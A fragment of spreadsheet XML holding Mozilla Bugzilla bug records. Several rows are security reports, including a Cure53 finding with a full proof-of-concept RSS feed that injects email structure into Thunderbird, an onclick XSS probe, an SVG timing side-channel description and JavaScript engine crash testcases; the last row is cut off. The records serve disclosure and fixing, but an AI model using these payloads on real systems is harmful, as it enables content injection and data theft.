      <c r="Q4688" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4688" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4688" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4688" t="n">
        <v>1</v>
      </c>
      <c r="U4688" t="n">
        <v>0</v>
      </c>
      <c r="V4688" t="n">
        <v>3</v>
      </c>
      <c r="W4688" t="inlineStr">
        <is>
          <t>Currently the Travis run takes anywhere from 8 to 15 minutes (wall time) to complete.
This is both tedious when authoring and reviewing PRs, and also slows down Heroku deploys (since they don't start until the Travis run has declared itself as passing).</t>
        </is>
      </c>
      <c r="X4688" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4689">
      <c r="A4689" t="n">
        <v>1411699</v>
      </c>
      <c r="B4689" t="inlineStr">
        <is>
          <t>2017-10-25 12:21:51 -0700</t>
        </is>
      </c>
      <c r="C4689" t="inlineStr">
        <is>
          <t>TBE-01-011: RSS Feed vulnerable against Email Injection</t>
        </is>
      </c>
      <c r="D4689" t="inlineStr">
        <is>
          <t>2020-02-16 17:13:15 -0800</t>
        </is>
      </c>
      <c r="E4689" t="n">
        <v>1</v>
      </c>
      <c r="F4689" t="n">
        <v>1</v>
      </c>
      <c r="G4689" t="n">
        <v>3</v>
      </c>
      <c r="H4689" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4689" t="inlineStr">
        <is>
          <t>MailNews Core</t>
        </is>
      </c>
      <c r="J4689" t="inlineStr">
        <is>
          <t>Feed Reader</t>
        </is>
      </c>
      <c r="K4689" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4689" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4689" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4689" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4689" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4689" t="inlineStr"/>
      <c r="Q4689" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4689" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4689" t="inlineStr">
        <is>
          <t>Thunderbird 59.0</t>
        </is>
      </c>
      <c r="T4689" t="n">
        <v>1</v>
      </c>
      <c r="U4689" t="n">
        <v>0</v>
      </c>
      <c r="V4689" t="n">
        <v>25</v>
      </c>
      <c r="W4689" t="inlineStr">
        <is>
          <t>Thunderbird supports import and rendering of RSS feeds. After a user imports a new RSS feed, it parses the entries and displays them. Specifically, Thunderbird parses the defined RSS items and converts them into an email structure to be able to properly display them. However, it was discovered that at least two RSS fields can inject new lines into the created email structure, therefore having a capacity to modify the whole body.
The media:content specifies resources, which should be appended as external attachments. The content of this element is placed after an X-Mozilla-External-Attachment-URL header in the created email structure but newlines are not filtered.
&lt;media:content url="&amp;#x0a;injected"&gt;&lt;/media:content&gt;
The content of the guid element is parsed and appended to the Message-ID header at the beginning of the email structure. To underscore, the newlines are not filtered and therefore the email structure can be tampered with.
&lt;guid isPermaLink="false"&gt;myguid&amp;#x0a;&lt;/guid&gt;
The following PoC abuses the guid element to inject a completely new email structure.
PoC RSS Feed:
&lt;?xml version="1.0" encoding="UTF-8"?&gt;
&lt;rss
xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:wfw="http://wellformedweb.org/CommentAPI/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
xmlns:georss="http://www.georss.org/georss"
xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#"
xmlns:media="http://search.yahoo.com/mrss/"
Cure53, Berlin · 10/11/17
9/35Dr.-Ing. Mario Heiderich, Cure53
Bielefelder Str. 14
D 10709 Berlin
cure53.de · mario@cure53.de
xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0"
version="2.0"
&gt;
&lt;channel&gt;
&lt;title&gt;Feed1&lt;/title&gt;
&lt;link&gt;http://foo.com/?"onclick=prompt(1)/&lt;/link&gt;
&lt;item&gt;
&lt;title&gt;Feed1&lt;/title&gt;
&lt;guid isPermaLink="false"&gt;myguid&amp;gt;&amp;#x0a;Content-Type:
multipart/alternative; boundary="------------
2DEE3F98D70BD2C65FBA7373"&amp;#x0a;MIME-Version: 1.0&amp;#x0a;Subject: feed1&amp;#x0a;From:
email@example.com&amp;#x0a;To: email@example.com&amp;#x0a;&amp;#x0a;This is a multi-part
message in MIME format.&amp;#x0a;--------------
2DEE3F98D70BD2C65FBA7373&amp;#x0a;Content-Type: multipart/related;
boundary="------------A320A96F6639F3C578F35383"&amp;#x0a;&amp;#x0a;&amp;#x0a;--------------
A320A96F6639F3C578F35383&amp;#x0a;Content-ID: myself&amp;#x0a;Content-Type:
text/html&amp;#x0a;Content-Transfer-Encoding:
7Bit&amp;#x0a;&amp;#x0a;&amp;lt;h1&amp;gt;header&amp;lt;/h1&amp;gt;&amp;#x0a;--------------
A320A96F6639F3C578F35383--&amp;#x0a;&amp;#x0a;--------------2DEE3F98D70BD2C65FBA7373--
&amp;#x0a;&amp;#x0a;&amp;#x0a;&amp;#x0a;&amp;#x0a;&lt;/guid&gt;
&lt;/item&gt;
&lt;/channel&gt;
&lt;/rss&gt;
The created email structure:
From - Wed, 20 Sep 2017 10:59:42 +0200
X-Mozilla-Status: 0041
X-Mozilla-Status2: 00000000
X-Mozilla-Keys:
Received: by localhost; Wed, 20 Sep 2017 10:59:42 +0200
Date: Wed, 20 Sep 2017 10:59:42 +0200
Message-Id: &lt;myguid&gt;
Content-Type: multipart/alternative; boundary="------------
2DEE3F98D70BD2C65FBA7373"
MIME-Version: 1.0
Subject: feed1
From: email@example.com
To: email@example.com
This is a multi-part message in MIME format.
--------------2DEE3F98D70BD2C65FBA7373
Content-Type: multipart/related; boundary="------------A320A96F6639F3C578F35383"
--------------A320A96F6639F3C578F35383
Content-ID: myself
Cure53, Berlin · 10/11/17
10/35Dr.-Ing. Mario Heiderich, Cure53
Bielefelder Str. 14
D 10709 Berlin
cure53.de · mario@cure53.de
Content-Type: text/html
Content-Transfer-Encoding: 7Bit
&lt;h1&gt;header&lt;/h1&gt;
--------------A320A96F6639F3C578F35383--
--------------2DEE3F98D70BD2C65FBA7373--@localhost.localdomain&gt;
From: Feed1
MIME-Version: 1.0
Subject: Feed1
Content-Transfer-Encoding: 8bit
Content-Base:
Content-Type: text/html; charset=UTF-8
&lt;html&gt;
&lt;head&gt;
&lt;title&gt;Feed1&lt;/title&gt;
&lt;base href=""&gt;
&lt;/head&gt;
&lt;body id="msgFeedSummaryBody" selected="false"&gt;
Feed1
&lt;/body&gt;
&lt;/html&gt;
It is recommended to remove all newlines specified in RSS fields. This should be done after entities are decoded to ensure that no newline can slip through. This ensures that an RSS feed cannot completely modify the created email structure.</t>
        </is>
      </c>
      <c r="X4689" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4690">
      <c r="A4690" t="n">
        <v>795880</v>
      </c>
      <c r="B4690" t="inlineStr">
        <is>
          <t>2012-10-01 06:34:55 -0700</t>
        </is>
      </c>
      <c r="C4690" t="inlineStr">
        <is>
          <t>[mobile][redesign] article listing (aka topic landing) page</t>
        </is>
      </c>
      <c r="D4690" t="inlineStr">
        <is>
          <t>2012-10-17 14:50:33 -0700</t>
        </is>
      </c>
      <c r="E4690" t="n">
        <v>1</v>
      </c>
      <c r="F4690" t="n">
        <v>1</v>
      </c>
      <c r="G4690" t="n">
        <v>5</v>
      </c>
      <c r="H4690" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4690" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J4690" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K4690" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4690" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4690" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4690" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4690" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4690" t="inlineStr">
        <is>
          <t>u=user c=wiki p=3 s=2012.19</t>
        </is>
      </c>
      <c r="Q4690" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4690" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4690" t="inlineStr">
        <is>
          <t>2012Q4</t>
        </is>
      </c>
      <c r="T4690" t="n">
        <v>1</v>
      </c>
      <c r="U4690" t="n">
        <v>0</v>
      </c>
      <c r="V4690" t="n">
        <v>4</v>
      </c>
      <c r="W4690" t="inlineStr">
        <is>
          <t>Once a user selects a topic on the product landing page, we send them to a list of articles.
Mockup: https://bug785813.bugzilla.mozilla.org/attachment.cgi?id=663957
This will be reusing the view from: https://support.mozilla.org/en-US/products/firefox/get-started (products.views.document_listing) using our mobility decorator `@mobile_template('products/{mobile/}documents.html')`.</t>
        </is>
      </c>
      <c r="X4690" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4691">
      <c r="A4691" t="n">
        <v>1246208</v>
      </c>
      <c r="B4691" t="inlineStr">
        <is>
          <t>2016-02-05 09:44:59 -0800</t>
        </is>
      </c>
      <c r="C4691" t="inlineStr">
        <is>
          <t>Remove Heroku post_compile collectstatic workaround</t>
        </is>
      </c>
      <c r="D4691" t="inlineStr">
        <is>
          <t>2016-05-27 07:59:18 -0700</t>
        </is>
      </c>
      <c r="E4691" t="n">
        <v>1</v>
      </c>
      <c r="F4691" t="n">
        <v>1</v>
      </c>
      <c r="G4691" t="n">
        <v>7</v>
      </c>
      <c r="H4691" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I4691" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J4691" t="inlineStr">
        <is>
          <t>Treeherder: Infrastructure</t>
        </is>
      </c>
      <c r="K4691" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L4691" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4691" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4691" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4691" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4691" t="inlineStr"/>
      <c r="Q4691" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R4691" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4691" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4691" t="n">
        <v>1</v>
      </c>
      <c r="U4691" t="n">
        <v>0</v>
      </c>
      <c r="V4691" t="n">
        <v>5</v>
      </c>
      <c r="W4691" t="inlineStr">
        <is>
          <t>The Python buildpack has now rewritten the automatic collectstatic feature [1], which fixes the issues that I'd reported to them [2].
As such we can remove the workaround I added in bug 1210367, once I've updated us to the latest buildpack release.
[1] https://github.com/heroku/heroku-buildpack-python/pull/273/files
[2] https://github.com/heroku/heroku-buildpack-python/issues/252</t>
        </is>
      </c>
      <c r="X4691" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4692">
      <c r="A4692" t="n">
        <v>1336622</v>
      </c>
      <c r="B4692" t="inlineStr">
        <is>
          <t>2017-02-03 14:55:13 -0800</t>
        </is>
      </c>
      <c r="C4692" t="inlineStr">
        <is>
          <t>Pixelstealing and history-stealing through floating-point timing side channel with SVG filters.</t>
        </is>
      </c>
      <c r="D4692" t="inlineStr">
        <is>
          <t>2020-10-07 11:03:12 -0700</t>
        </is>
      </c>
      <c r="E4692" t="n">
        <v>1</v>
      </c>
      <c r="F4692" t="n">
        <v>1</v>
      </c>
      <c r="G4692" t="n">
        <v>3</v>
      </c>
      <c r="H4692" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4692" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4692" t="inlineStr">
        <is>
          <t>SVG</t>
        </is>
      </c>
      <c r="K4692" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4692" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4692" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4692" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4692" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4692" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main52+][adv-esr45.8+][pixel-stealing]</t>
        </is>
      </c>
      <c r="Q4692" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4692" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4692" t="inlineStr">
        <is>
          <t>mozilla54</t>
        </is>
      </c>
      <c r="T4692" t="n">
        <v>1</v>
      </c>
      <c r="U4692" t="n">
        <v>0</v>
      </c>
      <c r="V4692" t="n">
        <v>22</v>
      </c>
      <c r="W4692" t="inlineStr">
        <is>
          <t>Created attachment 8833525
PoC part 1
This is a continuation of https://bugzilla.mozilla.org/show_bug.cgi?id=1131288 that now works on all versions of Firefox.
By rendering SVG filters that don't use the fixed point math implementation over a victim iframe the attacking page can extract pixel information. This leads to SOP violations (reading cross origin visual data) and history sniffing.
I'm attaching a PoC that works on all current versions of Firefox. It uses the feSpecularLighting SVG filter. Specifically, it uses the fact that the alpha channel of the input is multiplied against the surfaceScale property.
By setting the surfaceScale to a subnormal value, we can observe rendering time differences between a black input or a white input. (0*subnormal vs normal*subnormal can have a ~20x difference in speed).
It looks like a number of the filters (feConvolveMatrix, etc) have been ported to a fixed point implementation. This trick is likely to work on more than just the specular lighting filter, but only ones still using fp math.
This attack will be included in a USENIX Security submission (2/16), but even if accepted it won't be public for several months.
(If the PoC is giving you problems, try reloading it and changing the multiplier to something higher. Less than 2000 should still work correctly.)</t>
        </is>
      </c>
      <c r="X4692" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4693">
      <c r="A4693" t="n">
        <v>570451</v>
      </c>
      <c r="B4693" t="inlineStr">
        <is>
          <t>2010-06-06 23:40:19 -0700</t>
        </is>
      </c>
      <c r="C4693" t="inlineStr">
        <is>
          <t>segmentation fault when viewing a malformed PNG image</t>
        </is>
      </c>
      <c r="D4693" t="inlineStr">
        <is>
          <t>2013-05-18 18:14:58 -0700</t>
        </is>
      </c>
      <c r="E4693" t="n">
        <v>1</v>
      </c>
      <c r="F4693" t="n">
        <v>1</v>
      </c>
      <c r="G4693" t="n">
        <v>3</v>
      </c>
      <c r="H4693" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4693" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4693" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K4693" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4693" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4693" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4693" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4693" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4693" t="inlineStr">
        <is>
          <t>[sg:critical?][critsmash:patch]</t>
        </is>
      </c>
      <c r="Q4693" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4693" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4693" t="inlineStr">
        <is>
          <t>mozilla2.0b1</t>
        </is>
      </c>
      <c r="T4693" t="n">
        <v>1</v>
      </c>
      <c r="U4693" t="n">
        <v>0</v>
      </c>
      <c r="V4693" t="n">
        <v>92</v>
      </c>
      <c r="W4693" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/6.0.427.0 Safari/534.1
Build Identifier: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.3a5pre) Gecko/20100606 Minefield/3.7a5pre
A segmentation fault occurs when the mentioned image is opened in x86 Ubuntu 10.04 using either the default version of Firefox or the current nightly build. The error occurs in gfxASurface::SurfaceDestroyFunc. 
The backtrace from the nightly build is:
Program received signal SIGSEGV, Segmentation fault.
0x00d2a99b in gfxASurface::SurfaceDestroyFunc(void*) () from ./libxul.so
(gdb) bt
#0  0x00d2a99b in gfxASurface::SurfaceDestroyFunc(void*) () from ./libxul.so
#1  0x010a86a8 in ?? () from ./libxul.so
#2  0x00d97b14 in ?? () from ./libxul.so
#3  0x00d2add3 in gfxASurface::Release() () from ./libxul.so
#4  0x00000000 in ?? ()
The kinda worrysome looking 0 return address does not show up in the backtrace for default Firefox.
Not tested in 64-bit builds or other platforms yet.
Reproducible: Always
Steps to Reproduce:
$ firefox http://www.ee.oulu.fi/~aki/spark.png
Actual Results:  
$ firefox http://www.ee.oulu.fi/~aki/spark.png
Segmentation fault
$ 
Expected Results:  
$ firefox http://www.ee.oulu.fi/~aki/spark.png</t>
        </is>
      </c>
      <c r="X4693" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4694">
      <c r="A4694" t="n">
        <v>1196912</v>
      </c>
      <c r="B4694" t="inlineStr">
        <is>
          <t>2015-08-20 13:32:58 -0700</t>
        </is>
      </c>
      <c r="C4694" t="inlineStr">
        <is>
          <t>Tiles Campaign - Yahoo_Content ST_082415</t>
        </is>
      </c>
      <c r="D4694" t="inlineStr">
        <is>
          <t>2015-08-21 14:37:46 -0700</t>
        </is>
      </c>
      <c r="E4694" t="n">
        <v>1</v>
      </c>
      <c r="F4694" t="n">
        <v>1</v>
      </c>
      <c r="G4694" t="n">
        <v>6</v>
      </c>
      <c r="H4694" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4694" t="inlineStr">
        <is>
          <t>Content Services Graveyard</t>
        </is>
      </c>
      <c r="J4694" t="inlineStr">
        <is>
          <t>Traffic</t>
        </is>
      </c>
      <c r="K4694" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4694" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4694" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4694" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4694" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4694" t="inlineStr"/>
      <c r="Q4694" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4694" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4694" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4694" t="n">
        <v>1</v>
      </c>
      <c r="U4694" t="n">
        <v>0</v>
      </c>
      <c r="V4694" t="n">
        <v>3</v>
      </c>
      <c r="W4694" t="inlineStr">
        <is>
          <t>Hi Nan,
Here is the new set of Yahoo Content tiles. This are to go live on Monday
August 24th.
Client: Yahoo
Campaign: Yahoo_Content ST_082415
Flight date: 8/24/2015 - 8/30/2015
Cover Image and Rollover Image: See Doc:
https://drive.google.com/folderview?id=0B-KNrfE6kA03fkVIZHByWXJOOThhWVNubmNCa05wZXJBelNIbmFrUWNXTERxa3RrVVp5bW8&amp;usp=sharing
Category and URL: See Doc:
https://docs.google.com/a/yahoo-inc.com/spreadsheets/d/1u5zSNExO9GdMHKkiRo6Z1Wa1nr5aMtgZvyod6iyQrss/edit?usp=sharing
Thanks and let me know if you have any questions
-A</t>
        </is>
      </c>
      <c r="X4694" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4695">
      <c r="A4695" t="n">
        <v>909586</v>
      </c>
      <c r="B4695" t="inlineStr">
        <is>
          <t>2013-08-26 17:59:32 -0700</t>
        </is>
      </c>
      <c r="C4695" t="inlineStr">
        <is>
          <t>Assertion failure: frame-&gt;script-&gt;code &lt;= pc &amp;&amp; pc &lt; frame-&gt;script-&gt;code + frame-&gt;script-&gt;length, at vm/SPSProfiler.h</t>
        </is>
      </c>
      <c r="D4695" t="inlineStr">
        <is>
          <t>2015-02-25 21:53:06 -0800</t>
        </is>
      </c>
      <c r="E4695" t="n">
        <v>1</v>
      </c>
      <c r="F4695" t="n">
        <v>1</v>
      </c>
      <c r="G4695" t="n">
        <v>3</v>
      </c>
      <c r="H4695" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4695" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4695" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4695" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4695" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4695" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4695" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4695" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4695" t="inlineStr">
        <is>
          <t>[jsbugmon:][adv-main28+]</t>
        </is>
      </c>
      <c r="Q4695" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4695" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4695" t="inlineStr">
        <is>
          <t>mozilla28</t>
        </is>
      </c>
      <c r="T4695" t="n">
        <v>1</v>
      </c>
      <c r="U4695" t="n">
        <v>0</v>
      </c>
      <c r="V4695" t="n">
        <v>25</v>
      </c>
      <c r="W4695" t="inlineStr">
        <is>
          <t>Created attachment 795765
stack
function f(x) {
    this["__iterator__"] = x;
    for (var m in this)
    return this;
}
for each(let z in this) {
    try {
        f(z);
    } catch (e) {}
}
asserts js debug (64-bit threadsafe deterministic) shell on m-c changeset 17143a9a0d83 with --ion-eager at Assertion failure: frame-&gt;script-&gt;code &lt;= pc &amp;&amp; pc &lt; frame-&gt;script-&gt;code + frame-&gt;script-&gt;length, at vm/SPSProfiler.h
Setting s-s because Kannan has mentioned that SPS bugs may be bad.</t>
        </is>
      </c>
      <c r="X4695" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4696">
      <c r="A4696" t="n">
        <v>766452</v>
      </c>
      <c r="B4696" t="inlineStr">
        <is>
          <t>2012-06-19 21:55:37 -0700</t>
        </is>
      </c>
      <c r="C4696" t="inlineStr">
        <is>
          <t>Crash [@ OpenTypeReorderingOutput::getStringIndex] with measureText, Kannada script, ZWJ</t>
        </is>
      </c>
      <c r="D4696" t="inlineStr">
        <is>
          <t>2016-06-21 10:06:56 -0700</t>
        </is>
      </c>
      <c r="E4696" t="n">
        <v>1</v>
      </c>
      <c r="F4696" t="n">
        <v>1</v>
      </c>
      <c r="G4696" t="n">
        <v>3</v>
      </c>
      <c r="H4696" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4696" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4696" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K4696" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4696" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4696" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4696" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4696" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4696" t="inlineStr">
        <is>
          <t>[rdar://11707231][adv-main19+]</t>
        </is>
      </c>
      <c r="Q4696" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4696" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4696" t="inlineStr">
        <is>
          <t>mozilla19</t>
        </is>
      </c>
      <c r="T4696" t="n">
        <v>1</v>
      </c>
      <c r="U4696" t="n">
        <v>0</v>
      </c>
      <c r="V4696" t="n">
        <v>14</v>
      </c>
      <c r="W4696" t="inlineStr">
        <is>
          <t>Created attachment 634753
testcase (crashes Firefox when loaded)
Loading the testcase makes Firefox crash
  [@ OpenTypeReorderingOutput::getStringIndex ]
For Mac OS X 10.7.4 (11E53), this appears as
  [@ CoreText@0x837b4 ]  (bp-53a19b57-4ff8-4617-8835-b68db2120620)</t>
        </is>
      </c>
      <c r="X4696" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4697">
      <c r="A4697" t="n">
        <v>1369275</v>
      </c>
      <c r="B4697" t="inlineStr">
        <is>
          <t>2017-05-31 21:24:58 -0700</t>
        </is>
      </c>
      <c r="C4697" t="inlineStr">
        <is>
          <t>Please close the trademark related marketing components identified below</t>
        </is>
      </c>
      <c r="D4697" t="inlineStr">
        <is>
          <t>2017-06-12 14:45:26 -0700</t>
        </is>
      </c>
      <c r="E4697" t="n">
        <v>1</v>
      </c>
      <c r="F4697" t="n">
        <v>1</v>
      </c>
      <c r="G4697" t="n">
        <v>7</v>
      </c>
      <c r="H4697" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I4697" t="inlineStr">
        <is>
          <t>bugzilla.mozilla.org</t>
        </is>
      </c>
      <c r="J4697" t="inlineStr">
        <is>
          <t>Administration</t>
        </is>
      </c>
      <c r="K4697" t="inlineStr">
        <is>
          <t>Production</t>
        </is>
      </c>
      <c r="L4697" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4697" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4697" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4697" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4697" t="inlineStr"/>
      <c r="Q4697" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4697" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4697" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4697" t="n">
        <v>1</v>
      </c>
      <c r="U4697" t="n">
        <v>0</v>
      </c>
      <c r="V4697" t="n">
        <v>3</v>
      </c>
      <c r="W4697" t="inlineStr">
        <is>
          <t>Unless someone in Marketing owns these and objects, please close these components because such requests are handled in other ways. I'm leaving Mozilla Friday, so if you have any questions, please ask Casey (cced). Thanks.
Marketing &gt; Trademark Permissions
Marketing &gt; Trademark Violations
The Powered by Mozilla request for: special bug form under Marketing</t>
        </is>
      </c>
      <c r="X4697" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4698">
      <c r="A4698" t="n">
        <v>1138391</v>
      </c>
      <c r="B4698" t="inlineStr">
        <is>
          <t>2015-03-02 05:27:12 -0800</t>
        </is>
      </c>
      <c r="C4698" t="inlineStr">
        <is>
          <t>Crash [@ js::jit::JitFrameIterator::checkInvalidation] or Crash [@ js::jit::SnapshotIterator::SnapshotIterator] with weird address</t>
        </is>
      </c>
      <c r="D4698" t="inlineStr">
        <is>
          <t>2016-07-02 10:34:39 -0700</t>
        </is>
      </c>
      <c r="E4698" t="n">
        <v>1</v>
      </c>
      <c r="F4698" t="n">
        <v>1</v>
      </c>
      <c r="G4698" t="n">
        <v>3</v>
      </c>
      <c r="H4698" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4698" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4698" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4698" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4698" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4698" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4698" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4698" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4698" t="inlineStr">
        <is>
          <t>[jsbugmon:][adv-main37+]</t>
        </is>
      </c>
      <c r="Q4698" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4698" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4698" t="inlineStr">
        <is>
          <t>mozilla39</t>
        </is>
      </c>
      <c r="T4698" t="n">
        <v>1</v>
      </c>
      <c r="U4698" t="n">
        <v>0</v>
      </c>
      <c r="V4698" t="n">
        <v>23</v>
      </c>
      <c r="W4698" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision eea6188b9b05 (build with --enable-optimize --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --enable-debug, run with --thread-count=2):
for ( shiftpow = 0; shiftpow &lt; 33; shiftpow++ )
